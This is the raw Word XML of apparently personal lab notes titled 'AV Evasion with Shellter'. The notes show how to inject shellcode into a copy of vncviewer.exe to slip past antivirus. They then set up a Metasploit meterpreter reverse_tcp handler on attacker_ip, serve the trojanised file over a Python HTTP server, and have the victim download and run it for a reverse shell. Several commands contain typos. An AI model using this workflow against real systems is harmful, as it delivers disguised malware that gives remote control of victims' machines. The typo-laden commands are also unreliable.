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D5C61" w14:textId="6B6FCAF7" w:rsidR="00853ABF" w:rsidRPr="008D6D73" w:rsidRDefault="008D6D73">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D6D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AV Evasion </w:t>
      </w:r>
      <w:r w:rsidRPr="008D6D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="008D6D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shellter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B8913A" w14:textId="77777777" w:rsidR="008D6D73" w:rsidRDefault="008D6D73"/>
    <w:p w14:paraId="4AAA0F85" w14:textId="4A26DB76" w:rsidR="008805EC" w:rsidRPr="008805EC" w:rsidRDefault="008805EC" w:rsidP="008805EC">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008805EC">
        <w:t>Shellter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008805EC">
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="008805EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>legitimate penetration-testing tool</w:t>
      </w:r>
      <w:r w:rsidRPr="008805EC">
        <w:t xml:space="preserve"> used to </w:t>
      </w:r>
      <w:r w:rsidRPr="008805EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inject payloads into Windows executables</w:t>
      </w:r>
      <w:r w:rsidRPr="008805EC">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="008805EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>testing how well security tools detect threats</w:t>
      </w:r>
      <w:r w:rsidR="008E3C09">
        <w:t xml:space="preserve"> and more functionality.</w:t>
      </w:r>
      <w:r w:rsidRPr="008805EC">
        <w:br/>
        <w:t xml:space="preserve">It helps security professionals check if antivirus can detect modified or hidden </w:t>
      </w:r>
      <w:r w:rsidRPr="008805EC">
        <w:t>executables.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="008E3C09" w:rsidRPr="008E3C09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Only</w:t>
      </w:r>
      <w:r w:rsidR="008E3C09" w:rsidRPr="008E3C09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> works with 32-bit Windows EXE files</w:t>
      </w:r>
      <w:r w:rsidR="008E3C09" w:rsidRPr="008E3C09">
        <w:t>, not 64-bit ones.</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661FDEDB" w14:textId="77777777" w:rsidR="008805EC" w:rsidRPr="008805EC" w:rsidRDefault="008805EC" w:rsidP="008805EC">
      <w:r w:rsidRPr="008805EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In one line:</w:t>
      </w:r>
      <w:r w:rsidRPr="008805EC">
        <w:br/>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008805EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shellter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008805EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool that adds test payloads into EXE files to check antivirus detection and security defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639D030C" w14:textId="7C01AE41" w:rsidR="008805EC" w:rsidRDefault="008805EC"/>
    <w:p w14:paraId="5555ED3A" w14:textId="16B7F222" w:rsidR="008D6D73" w:rsidRPr="008805EC" w:rsidRDefault="008805EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008805EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A5BA25" w14:textId="77777777" w:rsidR="008805EC" w:rsidRDefault="008805EC"/>
    <w:p w14:paraId="446074E3" w14:textId="363FB750" w:rsidR="008805EC" w:rsidRDefault="00911C3A">
      <w:r>
        <w:t>Sudo apt-get install shelter -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3AD230" w14:textId="7A20429C" w:rsidR="00911C3A" w:rsidRDefault="00911C3A">
      <w:r>
        <w:t xml:space="preserve"># shelter package is the windows executable, so we use wine to run window executable on </w:t>
      </w:r>
      <w:r w:rsidR="008E3C09">
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04AB48" w14:textId="77777777" w:rsidR="00911C3A" w:rsidRDefault="00911C3A"/>
    <w:p w14:paraId="4CD8F5F8" w14:textId="03744C37" w:rsidR="008E3C09" w:rsidRDefault="008E3C09">
      <w:r>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dpkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - -add-architecture -386 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416B4E26" w14:textId="387A8ABD" w:rsidR="008E3C09" w:rsidRDefault="008E3C09">
      <w:r>
        <w:t xml:space="preserve"># to install the 32-bit packages as the current kali is 64-bit which cannot be able to install  </w:t>
      </w:r>
      <w:r>
        <w:t>32-bit packages</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593732E2" w14:textId="77777777" w:rsidR="008E3C09" w:rsidRDefault="008E3C09"/>
    <w:p w14:paraId="03A23717" w14:textId="2A10421A" w:rsidR="008E3C09" w:rsidRDefault="008E3C09">
      <w:r>
        <w:t>Sudo apt-get install wine32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8633D0" w14:textId="72907DF2" w:rsidR="008E3C09" w:rsidRDefault="008E3C09">
      <w:r>
        <w:t>#Now execute the shelter executable with wine32.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C99F9C8" w14:textId="77777777" w:rsidR="008E3C09" w:rsidRDefault="008E3C09"/>
    <w:p w14:paraId="2BB68D15" w14:textId="735E393C" w:rsidR="008E3C09" w:rsidRDefault="008E3C09">
      <w:r>
        <w:t>Cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/windows-resources/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25E87AEA" w14:textId="6FA86AFB" w:rsidR="008E3C09" w:rsidRDefault="008E3C09">
      <w:r>
        <w:t xml:space="preserve">Ls -la </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF8F93" w14:textId="77777777" w:rsidR="008E3C09" w:rsidRDefault="008E3C09"/>
    <w:p w14:paraId="53626CD0" w14:textId="0C76DDCD" w:rsidR="008E3C09" w:rsidRDefault="008E3C09">
      <w:r>
        <w:t xml:space="preserve">#How to execute .exe file on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (wine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD3BAA" w14:textId="0B20F595" w:rsidR="008E3C09" w:rsidRDefault="008E3C09">
      <w:r>
        <w:t>Sudo wine shellter.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06193A73" w14:textId="37EF50D0" w:rsidR="008E3C09" w:rsidRPr="008E3C09" w:rsidRDefault="008E3C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3C09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In another tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F065B" w14:textId="77777777" w:rsidR="008E3C09" w:rsidRDefault="008E3C09"/>
    <w:p w14:paraId="10E3A7CB" w14:textId="04B70F87" w:rsidR="008E3C09" w:rsidRDefault="001306B1">
      <w:r>
        <w:t>Cp /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:r w:rsidRPr="001306B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>windows-resources/</w:t>
      </w:r>
      <w:r>
        <w:t>vncviewer.exe .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C8F26" w14:textId="26D14CC6" w:rsidR="001306B1" w:rsidRDefault="001306B1">
      <w:r>
        <w:t># so that the original file is safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9D564E" w14:textId="77777777" w:rsidR="001306B1" w:rsidRDefault="001306B1"/>
    <w:p w14:paraId="4590C947" w14:textId="77777777" w:rsidR="001306B1" w:rsidRDefault="001306B1"/>
    <w:p w14:paraId="72A2B236" w14:textId="77777777" w:rsidR="001306B1" w:rsidRDefault="001306B1" w:rsidP="001306B1">
      <w:r>
        <w:t>Sudo wine shellter.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D70C4" w14:textId="0113DF48" w:rsidR="001306B1" w:rsidRDefault="001306B1">
      <w:r>
        <w:t>#A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E34AC2" w14:textId="00F896F2" w:rsidR="001306B1" w:rsidRDefault="001306B1">
      <w:r>
        <w:t>PE target: /home/kali/Desktop/vncviewer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F6D9DB" w14:textId="5FE4E3E2" w:rsidR="001306B1" w:rsidRDefault="00F02461">
      <w:r>
        <w:t># file the fields accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0E2CF5" w14:textId="77777777" w:rsidR="00F02461" w:rsidRDefault="00F02461"/>
    <w:p w14:paraId="4691D985" w14:textId="52C5AEE3" w:rsidR="00F02461" w:rsidRDefault="00F02461">
      <w:r>
        <w:t xml:space="preserve"># at the end it do it’s task od </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enjecting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a shellcode in the exe file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F0C7A" w14:textId="77777777" w:rsidR="00F02461" w:rsidRDefault="00F02461"/>
    <w:p w14:paraId="05A1F80E" w14:textId="52E4C79A" w:rsidR="00F02461" w:rsidRDefault="00F02461">
      <w:r>
        <w:t>#setup a handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9F7E5" w14:textId="4CDE0D84" w:rsidR="00F02461" w:rsidRDefault="00F02461">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE817E1" w14:textId="188B0374" w:rsidR="00F02461" w:rsidRDefault="000463FC">
      <w:r>
        <w:t>Use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA9654A" w14:textId="52F7F50D" w:rsidR="000463FC" w:rsidRDefault="000463FC">
      <w:r>
        <w:t>Set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0327B19C" w14:textId="7DAB9D51" w:rsidR="000463FC" w:rsidRDefault="000463FC">
      <w:r>
        <w:t xml:space="preserve">Set LHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F50F78C" w14:textId="215D1FA3" w:rsidR="000463FC" w:rsidRDefault="000463FC">
      <w:r>
        <w:t xml:space="preserve">Set LPORT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attacker_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DA0AC43" w14:textId="4A01A87F" w:rsidR="000463FC" w:rsidRDefault="000463FC">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E057C7" w14:textId="73F78E8C" w:rsidR="000463FC" w:rsidRDefault="00F75EB6">
      <w:r>
        <w:t xml:space="preserve">#   get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse shell .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CCA556" w14:textId="77777777" w:rsidR="00F75EB6" w:rsidRPr="000463FC" w:rsidRDefault="00F75EB6"/>
    <w:p w14:paraId="4B4C9E78" w14:textId="63BA7502" w:rsidR="00F02461" w:rsidRPr="00F02461" w:rsidRDefault="00F02461">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In another tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6E9A99" w14:textId="60A523E2" w:rsidR="00F02461" w:rsidRDefault="00F02461">
      <w:r>
        <w:t>Cd Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539687F0" w14:textId="312276CB" w:rsidR="00F02461" w:rsidRDefault="00F02461">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AC2915" w14:textId="2A08CBC9" w:rsidR="00F02461" w:rsidRDefault="00F02461">
      <w:r>
        <w:t xml:space="preserve">Sudo python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE4AA27" w14:textId="77777777" w:rsidR="00F02461" w:rsidRDefault="00F02461"/>
    <w:p w14:paraId="5C067E90" w14:textId="346FA6A9" w:rsidR="000463FC" w:rsidRDefault="000463FC">
      <w:r>
        <w:t>#Download this on the windows system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389591D" w14:textId="1367DEA5" w:rsidR="000463FC" w:rsidRDefault="000463FC">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="009B0D62">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://attacker_ip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C8B47DE" w14:textId="7A440FB4" w:rsidR="000463FC" w:rsidRDefault="000463FC">
      <w:r>
        <w:t>download the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4984BA" w14:textId="245EA161" w:rsidR="000463FC" w:rsidRDefault="000463FC">
      <w:r>
        <w:t>Click on it to run it and you will get the reverse shell in the multi hander.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA22AAD" w14:textId="77777777" w:rsidR="000463FC" w:rsidRDefault="000463FC"/>
    <w:p w14:paraId="158BE6FD" w14:textId="77777777" w:rsidR="00F02461" w:rsidRDefault="00F02461"/>
    <w:p w14:paraId="1AE22EA4" w14:textId="77777777" w:rsidR="00F02461" w:rsidRDefault="00F02461"/>
    <w:p w14:paraId="74670F3C" w14:textId="77777777" w:rsidR="008E3C09" w:rsidRDefault="008E3C09"/>
    <w:sectPr w:rsidR="008E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7FB"/>
    <w:rsid w:val="00042D9F"/>
    <w:rsid w:val="000463FC"/>
    <w:rsid w:val="001306B1"/>
    <w:rsid w:val="001D57FB"/>
    <w:rsid w:val="004663E8"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00826187"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008805EC"/>
    <w:rsid w:val="008D6D73"/>
    <w:rsid w:val="008E3C09"/>
    <w:rsid w:val="00911C3A"/>
    <w:rsid w:val="00A24F69"/>
    <w:rsid w:val="00C70BF3"/>
    <w:rsid w:val="00F02461"/>
    <w:rsid w:val="00F75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64B6F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2AAAC74A-B472-4711-8F42-AE7F92E3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7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7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7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7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7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7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7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7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7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7F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3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3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attacker_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258</Words>
  <Characters>1423</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>129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2025-12-05T06:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-05T07:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>